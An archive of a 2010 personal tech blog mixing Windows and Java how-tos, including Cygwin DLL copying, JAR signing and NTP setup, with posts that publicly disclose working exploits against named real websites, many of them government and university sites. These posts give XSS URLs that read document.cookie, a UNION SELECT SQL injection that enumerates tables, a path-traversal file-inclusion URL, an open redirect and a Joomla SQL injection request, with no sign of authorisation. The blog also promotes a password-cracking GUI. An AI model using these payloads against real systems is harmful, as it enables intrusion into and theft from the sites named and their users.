Wednesday, 25 August 2010

use cygwin/cygnus applications/executables without re-installing everything

A friend asked me how to use Cygwin binaries (executables and/or DLLs) standalone.
The procedure is very simple and has worked for me with many executables.

Install Cygwin (if you don't already have the files you need) and copy the executable(s) together with the Cygwin DLLs they depend on into one folder.
You will always need cygwin1.dll, whatever the program is.
Use Dependency Walker to find the other required DLLs (suggested method), or just run the program (awk in my case) and read the "missing DLL" errors; Cygwin's own cygcheck awk.exe also prints the DLLs a binary loads. Keep the executable and all of its DLLs in the same folder: Windows looks in the application's own directory first, so no reinstall of Cygwin is needed. Take the DLLs from the same Cygwin installation the executable came from; mixing cygwin1.dll versions, or running two different copies of cygwin1.dll at the same time, produces obscure failures.
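An added example, not part of the original post: the following Python script does the job Dependency Walker is used for above. It reads the import directory of a PE executable or DLL and follows the Cygwin DLLs it finds recursively, so you end up with the exact list of files to copy next to the .exe. The Windows system DLL list is a partial assumption, and the sample awk.exe / cygiconv-2.dll / cygwin1.dll are constructed in memory so the script runs offline; pass a real path such as C:\cygwin\bin\awk.exe to use it on your own installation.

```python
import struct, sys
from pathlib import Path

# DLLs that belong to Windows itself and must not be copied out of Cygwin (partial list, an assumption).
WINDOWS_SYSTEM_DLLS = {"kernel32.dll", "ntdll.dll", "user32.dll", "advapi32.dll",
                       "msvcrt.dll", "ws2_32.dll", "shell32.dll", "gdi32.dll"}


def _rva_to_offset(rva, sections):
    """Map a relative virtual address to a file offset via the section table."""
    for va, size, raw_ptr in sections:
        if va <= rva < va + size:
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} lies outside every section")


def imported_dlls(data):
    """Return the DLL names in the import directory of a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]             # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]          # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]     # COFF SizeOfOptionalHeader
    opt = pe + 24                                             # optional header start
    dd_base = {0x10B: 96, 0x20B: 112}[struct.unpack_from("<H", data, opt)[0]]
    imp_rva = struct.unpack_from("<I", data, opt + dd_base + 8)[0]  # data directory #1
    if imp_rva == 0:
        return []
    sections = []
    for i in range(nsec):                                     # 40-byte section headers
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8)
        sections.append((va, max(vsize, raw_size), raw_ptr))
    dlls, off = [], _rva_to_offset(imp_rva, sections)
    while True:
        # IMAGE_IMPORT_DESCRIPTOR is 20 bytes; field 4 is the RVA of the ASCIIZ DLL name
        name_rva = struct.unpack_from("<5I", data, off)[3]
        if name_rva == 0:                                     # all-zero entry ends the list
            break
        noff = _rva_to_offset(name_rva, sections)
        dlls.append(data[noff:data.index(b"\0", noff)].decode("ascii"))
        off += 20
    return dlls


def cygwin_dlls_to_copy(exe_name, read):
    """Transitively collect the non-Windows DLLs that exe_name loads.
    read(name) returns the file bytes from the Cygwin bin dir or None if absent."""
    needed, missing, seen, todo = set(), set(), set(), [exe_name]
    while todo:
        name = todo.pop()
        if name.lower() in seen:
            continue
        seen.add(name.lower())
        data = read(name)
        if data is None:
            missing.add(name)
            continue
        for dll in imported_dlls(data):
            if dll.lower() not in WINDOWS_SYSTEM_DLLS:
                needed.add(dll)
                todo.append(dll)
    return needed, missing


def build_sample_pe(imports):
    """Construct a minimal PE32 file holding only an import table (demo data)."""
    desc_size = 20 * (len(imports) + 1)
    names, name_rvas = b"", []
    for dll in imports:
        name_rvas.append(0x1000 + desc_size + len(names))
        names += dll.encode("ascii") + b"\0"
    idata = b"".join(struct.pack("<5I", 0x2000, 0, 0, r, 0x2000) for r in name_rvas)
    idata += b"\0" * 20 + names
    raw_size = (len(idata) + 0x1FF) & ~0x1FF
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)       # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                       # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 104, 0x1000, desc_size)      # import directory entry
    sec = struct.pack("<8sIIIIIIHHI", b".idata", len(idata), 0x1000, raw_size,
                      0x200, 0, 0, 0, 0, 0x40000040)
    header = (dos + b"PE\0\0" + coff + bytes(opt) + sec).ljust(0x200, b"\0")
    return header + idata.ljust(raw_size, b"\0")


# Constructed stand-in for C:\cygwin\bin (file names and import lists are made up).
SAMPLE_BIN = {
    "awk.exe": build_sample_pe(["cygwin1.dll", "cygiconv-2.dll", "KERNEL32.dll"]),
    "cygiconv-2.dll": build_sample_pe(["cygwin1.dll", "KERNEL32.dll"]),
    "cygwin1.dll": build_sample_pe(["KERNEL32.dll", "ntdll.dll"]),
}

if __name__ == "__main__":
    if len(sys.argv) > 1:                    # e.g. python cygdeps.py C:\cygwin\bin\awk.exe
        exe = Path(sys.argv[1])
        read = lambda n: (exe.parent / n).read_bytes() if (exe.parent / n).is_file() else None
        needed, missing = cygwin_dlls_to_copy(exe.name, read)
    else:
        needed, missing = cygwin_dlls_to_copy("awk.exe", SAMPLE_BIN.get)
    print("copy next to the exe:", *sorted(needed))
    if missing:
        print("not found in that directory:", *sorted(missing))
```

Run it against the real bin directory and the "copy" line is the file list for your standalone folder; anything reported as not found is a DLL the executable imports that is missing from that directory, which is exactly the situation behind the "missing DLL" error mentioned above.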

Tuesday, 24 August 2010

Manually uninstall Adobe (ex Macromedia) Flash | cannot open links in internet explorer

I recently had a problem with Adobe Flash (v. 10a?) on Windows and tried to uninstall it with Adobe's own uninstaller, without success. Here is the manual way.

The folder is
%windir%\system32\Macromed\Flash
(on 64-bit Windows the 32-bit plugin lives in %windir%\SysWOW64\Macromed\Flash instead)

Unregister the OCX from an elevated (administrator) command prompt, replacing VERSION with the suffix of the file you actually have in that folder:
regsvr32 /u %windir%\system32\Macromed\Flash\flashVERSION.ocx
and delete the whole folder
%windir%\system32\Macromed\Flash

Optionally, also delete the per-user data in
%APPDATA%\Macromedia\Flash Player

-----------------------------
Some versions of Flash Player 10 have several problems with Internet Explorer 8.
I ran into one where I couldn't open/click the links from any text field... quite strange.

For version 10i of Flash I solved it just by re-registering the OCX:

regsvr32 %windir%\system32\Macromed\Flash\flash10i.ocx

An easy thing to do... but it bothered me for more than 2 hours -.-

Thursday, 12 August 2010

OpenID Endpoints List

AOL - http://openid.aol.com/username
Blogspot - http://username.blogspot.com/
Certifi.ca - http://certifi.ca/username
Chimp - http://chi.mp/ (tested as specified by the site... but not working?)
Claimid - http://claimid.com/username
Facebook - ????
Flickr (Yahoo) - http://flickr.com/username
Google - https://www.google.com/accounts/o8/id
Hyves - http://www.hyves.nl/
Identitude - https://username.identitu.de (outdated: the domain is now for sale)
Linuxfeed (MyOpenID) - https://openid.linuxfeed.org/
LiveJournal - http://username.livejournal.com
MyID - https://myid.net/
MyOpenID - https://myopenid.com/
MySpace - http://www.myspace.com/username
Myvidoop - http://username.myvidoop.com
MyDocomo - https://i.mydocomo.com
Steam - http://steamcommunity.com/openid/username
Technorati - http://technorati.com/people/technorati/username/
Tinyid (dead) - http://tinyid.us/username
Typepad - http://profile.typekey.com/username
Virgilio - http://www.myvirgilio.it | http://username.myvirgilio.it
Verisign - http://pip.verisignlabs.com/
Wordpress - http://username.wordpress.com
Yahoo - http://me.yahoo.com/

References: http://openiddirectory.com

Friday, 6 August 2010

Sign java application - solve the mixed signed code of pjirc

How to get rid of the annoying "mixed signed and unsigned code" warning in applets like PjIRC (this post was written for that specific applet). Since Java 6 Update 19 the plugin warns when an applet loads a signed JAR together with an unsigned one; the fix is to sign every JAR the applet loads with the same key, instead of mixing a vendor-signed JAR with unsigned ones.


Tools needed: the Java JDK (just download it from the Sun/Oracle website).
http://www.oracle.com/technetwork/java/javase/downloads/index.html


I've used the same password for the keystore and the key... it's not a good idea... but who cares.

password keystore: pjircpjirc12345
key password: pjircpjirc12345


Remember to have the JDK binaries in the PATH.
Go to the pjirc folder and rename irc-unsigned.jar to irc.jar (this replaces the vendor-signed irc.jar with the unsigned build, which you then sign yourself).

Use these lines in a batch file. Modify them as much as you want.


-----batchfile.bat------
REM 1. Create an RSA key pair under the alias "pjirc" in the default keystore (%USERPROFILE%\.keystore)
keytool -genkey -keyalg rsa -alias pjirc -dname "CN=Trueliar, OU=Somebody, O=SomeCompany, L=Somewhere, ST=Somewhere, C=IT" -storepass pjircpjirc12345 -keypass pjircpjirc12345
REM 2. Export the self-signed certificate (useful if you want to import it as trusted elsewhere)
keytool -export -alias pjirc -file pjirc.crt -storepass pjircpjirc12345
REM 3. Sign BOTH jars with the same key: the mixed-code warning only goes away when every jar the applet loads carries the same signature
jarsigner -storepass pjircpjirc12345 -keypass pjircpjirc12345 irc.jar pjirc
jarsigner -storepass pjircpjirc12345 -keypass pjircpjirc12345 pixx.jar pjirc
REM 4. Check the result (run it for irc.jar too if you want)
jarsigner -verify -verbose -certs pixx.jar
-----end of batchfile.bat------






Now you can use PjIRC without the second annoying message about mixed signed and unsigned code.
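An added example (my code, not part of the original post or of PjIRC): a Python check that tells you, before you ever load the applet, whether the JARs are in the state that triggers the mixed-code warning, some signed and some not, or signed under different aliases. It only inspects the structure jarsigner leaves behind (META-INF/<ALIAS>.SF plus a .RSA/.DSA/.EC signature block); the cryptographic verification is still jarsigner -verify's job. The irc.jar and pixx.jar below, and the class entries inside them, are constructed in memory for the demo.

```python
import io
import re
import zipfile

# jarsigner stores a signature as META-INF/<ALIAS>.SF plus a signature block
# META-INF/<ALIAS>.RSA / .DSA / .EC, where ALIAS is the key alias upper-cased
# and cut to 8 characters ("pjirc" -> PJIRC.SF / PJIRC.RSA).
_SIG_BLOCK = re.compile(r"^META-INF/([^/]+)\.(RSA|DSA|EC)$")


def jar_signers(jar_bytes):
    """Return the signature aliases whose .SF and signature block are both present."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as z:
        names = set(z.namelist())
    signers = set()
    for n in names:
        m = _SIG_BLOCK.match(n)
        if m and f"META-INF/{m.group(1)}.SF" in names:
            signers.add(m.group(1))
    return signers


def mixed_code_report(jars):
    """jars: {filename: bytes}. Returns (unsigned, signer_sets, ok).

    ok is True only when every jar is signed and all jars carry the same
    signer set. Jars signed under different aliases are not flagged as
    unsigned, but ok is False for them too, so you see the mismatch.
    Structural check only: use `jarsigner -verify` to validate signatures."""
    signer_sets = {name: frozenset(jar_signers(data)) for name, data in jars.items()}
    unsigned = sorted(n for n, s in signer_sets.items() if not s)
    distinct = {s for s in signer_sets.values() if s}
    ok = not unsigned and len(distinct) == 1
    return unsigned, signer_sets, ok


def make_jar(class_names, signer=None):
    """Build a constructed test jar in memory; `signer` adds placeholder signature files."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\n\r\n")
        for c in class_names:
            z.writestr(c, b"\xca\xfe\xba\xbe")                # class-file magic only
        if signer:
            z.writestr(f"META-INF/{signer}.SF", "Signature-Version: 1.0\r\n\r\n")
            z.writestr(f"META-INF/{signer}.RSA", b"\x30\x00")  # placeholder PKCS#7 blob
    return buf.getvalue()


# Constructed stand-ins for the applet's jars before and after the batch file above.
BEFORE = {"irc.jar": make_jar(["IRCApplet.class"], signer="PJIRC"),
          "pixx.jar": make_jar(["pixx/PixxConfiguration.class"])}
AFTER = {"irc.jar": make_jar(["IRCApplet.class"], signer="PJIRC"),
         "pixx.jar": make_jar(["pixx/PixxConfiguration.class"], signer="PJIRC")}

if __name__ == "__main__":
    import pathlib, sys
    jars = {p.name: p.read_bytes() for p in map(pathlib.Path, sys.argv[1:])} or BEFORE
    unsigned, signer_sets, ok = mixed_code_report(jars)
    for name, s in signer_sets.items():
        print(f"{name}: {'signed by ' + ', '.join(sorted(s)) if s else 'UNSIGNED'}")
    print("mixed-code warning expected:", "no" if ok else "yes", "- unsigned:", unsigned)
```

Point it at the real files (python jarcheck.py irc.jar pixx.jar) after running the batch file: every jar must show the same alias and the last line must say "no".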




-------------------------------------------------------------------------------


Some links I visited as reference:

# keytool.exe and jarsigner.exe from the Sun Java Software Development Kit (version 1.4.2_06)
    web: java.sun.com/j2se/1.4.2/
    download: java.sun.com/j2se/1.4.2/download.html

# openssl.exe from the Win32 OpenSSL library (version 0.9.7e)
    web: http://www.openssl.org/
    download: www.openssl.org/related/binaries.html

# thawtecleaner.jar from Richard Dallaway
    web: www.dallaway.com/acad/webstart/
    download: www.dallaway.com/acad/webstart/thawtecleaner.jar

# signcode.exe from the Microsoft Authenticode Software Development Kit
    web: msdn.microsoft.com/workshop/security/authcode/intro_authenticode.asp
    download: download.microsoft.com/download/b/e/f/bef2551b-401d-4311-ab8f-13d3892b8154/codesigningx86.exe

http://www.pantaray.com/signcode.html
http://forum.pjirc.com/viewtopic.php?p=2832

Thursday, 27 May 2010

MSSql or MSSqhell?

I've spent a lot of time (crappily) coding some converters from MySQL to Access (and vice versa), while such tools already exist on the internet and those DBMSs already have basic features to export whole databases in a human-readable, easy-to-use format.
I've found that the biggest problem is the lack of decent tools to export MSSQL.
Since I'm quite busy I hoped to find an easy solution (tool) to export all the databases of an MSSQL Express server into a simple SQL text file.
I know that I can use "osql" to do a backup, but I needed a damn SQL text file with the structure and the data, just to modify several things by hand, understand the different kinds of queries, and then restore the database in an error-free manner.

After a whole day I found only a single decent tool that worked efficiently:
EMS MS SQL Manager Lite
The Lite version is free and is good enough for basic administration of an Express edition of MSSQL.

If you have a full version of MSSQL (€€€ $$$) you can export the database(s) in several formats using the administration tools. The problem is that you need to own the software.

----
Other generic free tools for the administration of MSSQL (Express)

DbaMgr

DbaMgr2k
http://www.asql.biz/en/Download.aspx#DbaMgr

osql batch database extractor (doesn't work as expected)
http://www.rs-freeware.org/osql/#install

Java client (I don't have Java installed on the server and had no time to upload the JRE, so I don't know whether it's a good tool or not.)
http://squirrel-sql.sourceforge.net/
-------


Suggestions about other tools are welcome.

net time on windows??? I've never used it before ...

I recently found out about some commands that have been available since Windows 2000 (afaik), though some references say Windows 95 (http://www.computerhope.com/nethlp.htm).
I had never used them, but they are quite useful when you need to sync several computers in batch, especially within an Active Directory domain.


UDP port 123 (SNTP, RFC 4330) - TCP port 37 (TIME, RFC 868)

I've added the nearest server.
net time /setsntp:"ntp.prato.linux.it"
(more servers can be given, separated by a space)
This only stores the server list for the Windows Time service; restart the service (net stop w32time, then net start w32time) so it picks the list up, and run w32tm /resync to synchronise immediately. net time /querysntp shows the current setting.


On Linux I've always used this command
sntp -a ntp.prato.linux.it
to adjust the time from a server,

and/or edited
/etc/ntp.conf
adding the simple line
server ntp.prato.linux.it

Lists of servers are available on ntp.org.
I'm unable to use the NTP pools, they just time out (?).

https://support.ntp.org/bin/view/Servers/StratumOneTimeServers
https://support.ntp.org/bin/view/Servers/StratumTwoTimeServers
https://support.ntp.org/bin/view/Servers/NTPPoolServers
http://tf.nist.gov/tf-cgi/servers.cgi
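An added example, not from the original post: a Python client for the two protocols named above. It builds the same 48-byte SNTP request that the Windows Time service and the sntp command send to UDP 123 and parses the reply, and it also decodes the 4-byte R FC 868 TIME reply from port 37, including the 1900-to-1970 epoch conversion and the stratum-0 "kiss-o'-death" case that must never be used to set a clock. The server reply bytes are constructed inline so it runs offline; the live query to ntp.prato.linux.it at the end is optional and only runs when the script is executed directly.

```python
import socket
import struct
import time

NTP_EPOCH_OFFSET = 2208988800   # seconds from 1900-01-01 (NTP/TIME epoch) to 1970-01-01 (Unix)
NTP_PORT, TIME_PORT = 123, 37


def build_sntp_request():
    """48-byte SNTP client packet: LI=0, VN=3, Mode=3 (client), everything else zero."""
    return bytes([0x1B]) + b"\0" * 47


def parse_sntp_response(packet):
    """Return the server's transmit timestamp as Unix time (float).

    Rejects packets that are too short, that are not server replies
    (mode 4 unicast / 5 broadcast), or that carry stratum 0, which marks
    an unsynchronised server or a kiss-o'-death and must not set the clock."""
    if len(packet) < 48:
        raise ValueError("SNTP reply shorter than 48 bytes")
    mode, stratum = packet[0] & 0x07, packet[1]
    if mode not in (4, 5):
        raise ValueError(f"not a server reply (mode {mode})")
    if stratum == 0:
        raise ValueError("stratum 0: server unsynchronised or kiss-o'-death")
    secs, frac = struct.unpack("!II", packet[40:48])      # transmit timestamp
    return secs - NTP_EPOCH_OFFSET + frac / 2**32


def parse_time_protocol(packet):
    """RFC 868 TIME (port 37): one big-endian uint32, seconds since 1900."""
    if len(packet) != 4:
        raise ValueError("TIME reply must be exactly 4 bytes")
    return struct.unpack("!I", packet)[0] - NTP_EPOCH_OFFSET


def clock_offset(server_unix_time, local_unix_time):
    """Positive when the local clock is behind the server."""
    return server_unix_time - local_unix_time


def query_sntp(host, timeout=3.0):
    """Ask one SNTP server over UDP 123 and return its time as Unix seconds."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_sntp_request(), (host, NTP_PORT))
        data, _ = s.recvfrom(512)
    return parse_sntp_response(data)


# Constructed server reply for offline use: mode 4, stratum 2, transmit
# timestamp 2010-08-25 00:00:00.5 UTC (3491683200 s since 1900, fraction 0.5).
_reply = bytearray(48)
_reply[0] = 0x24                                     # LI=0, VN=4, Mode=4 (server)
_reply[1] = 2                                        # stratum 2
struct.pack_into("!II", _reply, 40, 3491683200, 0x80000000)
SAMPLE_SNTP_REPLY = bytes(_reply)
SAMPLE_TIME_REPLY = struct.pack("!I", 3491683200)    # same instant, TIME protocol form

if __name__ == "__main__":
    t = parse_sntp_response(SAMPLE_SNTP_REPLY)
    print("sample reply:", time.strftime("%Y-%m-%d %H:%M:%S UTC", time.gmtime(t)))
    try:                                             # live query; needs network access
        live = query_sntp("ntp.prato.linux.it")
        print(f"offset vs local clock: {clock_offset(live, time.time()):+.3f} s")
    except (OSError, ValueError) as e:
        print("live query failed:", e)
```

SNTP carries no authentication at all, so an offset reported by this client (or by net time) is only as trustworthy as the network path to the server; for machines that verify Kerberos tickets or certificate validity periods, keep the client on the domain controller or a server you control.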


I know that this post is useless, but I'm publishing it for myself, to remember something I forget every time.


Suggestions and more information are welcome.

Wednesday, 26 May 2010

mirror of the old website of packetstuff.com

I've found a mirror of the old packetstuff.com website,
with all the tools using the PSSDK (WinPcap to PSSDK migration module).
Some links are dead and there are too many banners, but generally it should work.

http://packetstuff.interfree.it/

Friday, 21 May 2010

http://www.mfa.gov.ir | XSS

Simple XSS

http://www.mfa.gov.ir/cms/cms/simple_search.jsp
(in the form)
<script>alert(document.cookie);</script>

Thursday, 20 May 2010

rockol.it XSS

rockol.it XSS

The XSS fires on mouse-over of the link:
http://www.rockol.it/search.php?s=Alessandra%20Amoroso%202010%3Cdollo'%20onmouseover='alert(1);'%20title='

Wednesday, 19 May 2010

Various tools that I've archived long time ago

A collection of various free tools and books that I archived a long time ago.

I've made several changes and cannot keep this collection updated every time.
http://websec.interfree.it 

Monday, 17 May 2010

gay.tv | XSS

gay.tv xss

XSS (simple)
-
(old and ... *fixed*)
http://www.gay.tv/aggregato.jsp?string=<script>alert(1);</script>&x=0&y=0

(new XSS)
----
http://www.gay.tv/search/?123%3Cscript%3Ealert%281%29;%3C/script%3E

Thursday, 13 May 2010

http://www.murrayky.gov | Sql injection

SQL injection (ID parameter)
http://www.murrayky.gov/showevent.htm?ID='

-error-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
---


http://www.murrayky.gov/showevent.htm?ID=123+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16%20from%20information_schema.tables--

http://www.mssti.com/

abbcode.php problem

/home/mssti/public_html/phpbb3/

Wednesday, 12 May 2010

A list of useful crowdsourcing websites

 
Reference/source for the websites: CrunchBase ("CrunchBase is the free database of technology companies, people, and investors")

CrowdSpirit: "The CrowdSpirit platform proposes a new model based on crowdsourcing that enables businesses to involve innovators from outside the company directly in the design of innovative products and services"

crowdsourcing - movies

http://tweetmeme.com | XSS

While subscribing to utest.com I found this simple XSS on tweetmeme.com (a service they use to tweet... I suppose).
Funny...?

XSS (no checks/sanitizing... nothing)
http://tweetmeme.com/popup/option?url_id=984607153&source=utest&service=bit.ly.%22>%3Cvideo src=1 onerror=alert(document.cookie) >

http://tweetmeme.com/popup/option?url_id=984607153&source=utest%22%3E%3Cvideo%20src=1%20onerror=alert(document.cookie)%20%3E&service=bit.ly

http://tweetmeme.com/popup/option?url_id=984607153%22%3E%3Cvideo%20src=1%20onerror=alert(document.cookie)%20%3E&source=utest&service=bit.ly

open redirect (any destination)
http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=135&nurl=http://www.google.com

spammy
http://blog.tweetmeme.com/?s=.&feed=Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc sit amet elit turpis. Cras elementum, turpis quis rutrum viverra, dui sapien auctor lorem, sed suscipit dui odio eget ligula. Nunc a sem mauris, a porta tortor. Nunc in varius justo. Praesent venenatis ultrices condimentum. Morbi eget imperdiet ante. Praesent eros metus, pulvinar nec laoreet a, aliquam nec orci. Nunc cursus condimentum lacus, at dictum sapien tincidunt non. Nullam gravida condimentum leo, id porta nibh placerat sit amet. Phasellus sed elit vel quam ornare laoreet.

Monday, 10 May 2010

www.interno.it | XSS

Various characters are replaced, but the XSS is still possible and we can redirect the user wherever we want.
The XSS is triggered by the onmouseover on the available images.

In this case we send the user to Google.

XSS

http://www.interno.it/mininterno/site/it/sezioni/sala_stampa/gallery/2010/0934_maroni_in_visita_al_cairo/index.html?month=5%22%20onmouseover=%22location.href='http://www.google.com';


same problem in other pages of the website
http://www.interno.it/mininterno/site/it/sezioni/sala_stampa/gallery/2010/0934_maroni_in_visita_al_cairo/9.html?month=5%22%20onmouseover=%22location.href=%27http://www.google.com%27


Note: we can also change the stylesheet and do other things. This is just a sample.

New Version of mdcrackgui

"A simple GUI for the mdcrack application. -MDCrack is a free featureful password cracker designed to bruteforce 21 algorithms: MD2, MD4, MD5, HMAC-MD4, HMAC-MD5, FreeBSD, Apache, NTLMv1, IOS and PIX (both enable and user) hashes"

List of the supported algorithms
MD2, MD4, MD5, MD5MD5, MD4MD4, MD4MD4S, MD5MD5S, HMAC-MD4, HMAC-MD5,IPB2, PHP, PHPS, FREEBSD, NTLM1, PIX, PIX-U, IOS, APACHE, CRC32, CRC32-B, ADLER32

Redirecting the console output/errors to a textbox is still not fully working. You can still use the console (the default).

https://sourceforge.net/project/mdcrackgui

New version of Firefox Portable WebTools

New version of  Firefox Portable WebTools

"a Portable version of Mozilla Firefox with several add-ons that are useful for Web Application Security. The purpose of this package is to have the best available addons to manually test XSS, SQL, siXSS, CSRF, Trace XSS, RFI, LFI, etc"


The changes
Added Theme Sky+
Added Groundspeed Addon
NoScript updated
.net addon updated
Added a long list of (my) bookmarks. Initial sorting and organization.
Added a batch file to clean a bit of useless data


https://sourceforge.net/projects/firefoxwebtools


In the next version:
Added FireGPG (still under testing, not yet portable)
Cleaning for FireGPG (to check whether we want to remove the keys)
Firebug updated
Access Me updated
SQL Inject Me updated
XSS Me updated
Wappalyzer updated

Probably I will add an intermediate release with only the regular addon updates.

Sunday, 9 May 2010

casapounditalia.org | SQL Injection in joomla

Sample POST (Joomla bug, google for it)
http://www.casapounditalia.org:80/index.php?option=com_content&view=%2527&id=35&Itemid=60
id=35&sectionid=6&task=category&filter_order=a%2Edates

----

Warning: Invalid argument supplied for foreach() in /home/casapoundi/domains/casapounditalia.org/public_html/components/com_content/models/category.php on line 337

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/casapoundi/domains/casapounditalia.org/public_html/libraries/joomla/database/database/mysql.php on line 344

Chi Siamo

Friday, 7 May 2010

kisskiss.it | XSS

XSS (nick)
http://www.kisskiss.it/Eventi?s=1&nick=nickname<script>alert(1);</script>&profilo=4558b8be-57ba-11df-8fc9-9dcf6b19122e

 -
http://www.kisskiss.it/OnAir?radio=%3Cscript%3Ealert(document.cookie);%3C/script%3Esroldasrock

Wednesday, 5 May 2010

A list of chat, live chat scripts

A list of chat, live chat scripts.

https://sourceforge.net/projects/webberchat/
https://sourceforge.net/projects/icsc/
https://sourceforge.net/projects/ajax-chat/
https://sourceforge.net/projects/cconnect/
https://sourceforge.net/projects/phpchatter/
http://www.craftysyntax.com/
http://code.google.com/p/php-lively/
http://mibew.org/
http://www.reallinkchat.com/
http://www.helpcenterlive.com/
http://www.chattist.com/

Under testing

Tuesday, 4 May 2010

vark.com | XSS

Vark.com has lately been acquired by Google.

This XSS seems to be useless (theoretically harmless).



Just add, for a new topic:

<img src=1 onerror=alert(document.cookie)>


-------------

For the second XSS




do the same
<img src=1 onerror=alert(document.cookie)>
when adding a topic to one of your friends

---------------------------------
For the third XSS add the payload

<img src=1 onerror=alert(document.cookie)>
in the activities of your profile; when vark.com loads them (after registration, in the share area)
you will see it working.
This works only once.

-----------

All these XSSs are useless in theory.

metranslate

I've added to SourceForge a very old VB.NET application.
It's really crappy and outdated, but it should work and can still be used for the latest Mailenable language files.


https://sourceforge.net/projects/metranslate/
A standalone application that helps translate the language files of Mailenable (a mail server for Microsoft Windows).
Mailenable website http://www.mailenable.com/
This is an alternative to MELangTranslator.exe for Mailenable.

Facebook Application ..... partial XSS ...

Facebook Application XSS
(basically you can also load any image to the user, e.g. the Google logo)

http://apps.facebook.com/funny_pho_to_widget/?shared=



I'm not able to inject other JS functions (they are encoded or removed)... so I'm a bit stuck with the fact that I cannot use the cookies.
I will add more information if I manage to do something different from a stupid and useless alert.

FirefoxPortableWebTools 0.0.0.4

A new version of Firefox Web Tools is available for the download
https://sourceforge.net/projects/firefoxwebtools/

"A Portable version of Mozilla Firefox with several add-ons that are useful for Web Application Security. The purpose of this package is to have the best available addons to manually test XSS, SQL, siXSS, CSRF, Trace XSS, RFI, LFI, etc"


-Changelog-

FirefoxPortableWebTools-0.0.0.4
Added Theme Sky+
Added Groundspeed Addon
NoScript updated
.net addon updated
Added a long list of (my) bookmarks. Initial sorting and organization.
Added a batch file to clean a bit of useless data

Read the respective licenses of Mozilla Firefox and all the addons!


Maybe I'm the only person using it :)
Anyway... it's free.

Monday, 3 May 2010

http://search.mit.edu/ - http://sap.mit.edu | XSS

simple XSS in the search form
http://sap.mit.edu/information/search/

"><script>alert(document.cookie);</script><"
---

xss
-
http://search.mit.edu/search?q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&btnG=Go&site=mit&client=mit&proxystylesheet=http%3A%2F%2Fweb.mit.edu%2Fcre%2Fc%2Fgoogle-crestyles-v4.xsl&output=xml_no_dtd&as_dt=i&as_sitesearch=http%3A%2F%2Fweb.mit.edu%2Fcre&proxyreload=1

www.slac.stanford.edu | XSS

http://www.slac.stanford.edu/spires/find/jobs/wwwbrief?FIELD=&REGION=&RANK=&cc=&SEQUENCE=da%28d%29&abs=%22%3E%3Cvideo+src%3D1+onerror%3Dalert%28document.cookie%29%3E

comune.trento.it | SQL Injection

SQL injection, JSP -> DB2.

(this works after a few POST requests)
http://webapps.comune.trento.it/statistiche_elettorali/StatisticheLista.do?arkRifMan=1272909259708,1272909305354&pager.order_by=WKVOVA0'8

javax.servlet.jsp.JspException: ServletException in '/framework/statistiche_lista.jsp': Errore DB :Errore SQL file : ETWKXXF1 [SQL0010] Inizio costante stringa '8, WKVOV' non delimitato.
(DB error: SQL error, file ETWKXXF1 [SQL0010]: string constant beginning '8, WKVOV' not delimited.)

www.israelnationalnews.com | XSS

XSS
http://www.israelnationalnews.com/Subscribe/?email=dasewqr%40dasa.com%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E&subscribe_submit=Join

www.sviluppoeconomico.gov.it | XSS - Blind SQL Injection - LFI - System Compromise

http://www.sviluppoeconomico.gov.it/primopiano/dettaglio_primopiano.php?sezione=primopiano&tema_dir=../index.php&id_primopiano=87
Warning: require(../../index.php\0\0/navigazione/right_menu.php) [function.require]: failed to open stream: No such file or directory in /var/www/sitomap/primopiano/dettaglio_primopiano.php on line 25


sample SQL injection
http://www.sviluppoeconomico.gov.it/organigramma/elenco_dossier.php?sezione=organigramma&tema_dir=tema2&gruppo=5%20group%20by%201

-
Fatal error: Call to a member function Fields() on a non-object in /var/www/sitomap/class/lista_dossier.php on line 45
-

http://www.vigilfuoco.it | XSS - SQL Injection

Full of XSS and SQL injections, with access to 2 DBMSs. Possible system compromise. (main language: ASP)

----------------------------------------------OLD deadlinks/fixed -------------------------------
XSS
http://www.vigilfuoco.it/emailCert/default.asp (form)
"><script>alert(document.cookie);</script><"



http://prevenzioneonline.vigilfuoco.it/VVF/HttpAdapter?CMD=loginDebole&forward=consultazioneMultiplaHandler&codFun=2&action_btn=loginInSessione&nomeServizio=Consultazione%3Cscript%3Ealert(document.cookie);%3C/script%3E


SQL Injections

The first, with an Oracle error
http://www.vigilfuoco.it/informazioni/norme_attivita_istituzionali/indice_cronologico.asp?menu=52'

-------------------------------------------------------
OraOLEDB error '80004005'

ORA-01756: stringa tra virgolette terminata in modo irregolare (quoted string not properly terminated)

/includes/menu.asp, line 44
--------------------------------------------------------





This one is related to
http://www.vigilfuoco.it/informazioni/norme_attivita_istituzionali/indice_cronologico.asp?cboPeriodo=%3Casso4&btnNome1=Vai

-------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'id_periodo = <asso4'.

/informazioni/norme_attivita_istituzionali/indice_cronologico.asp, line 72
-------

http://www.vigilfuoco.it/notiziario/archivio.asp (form)
---------
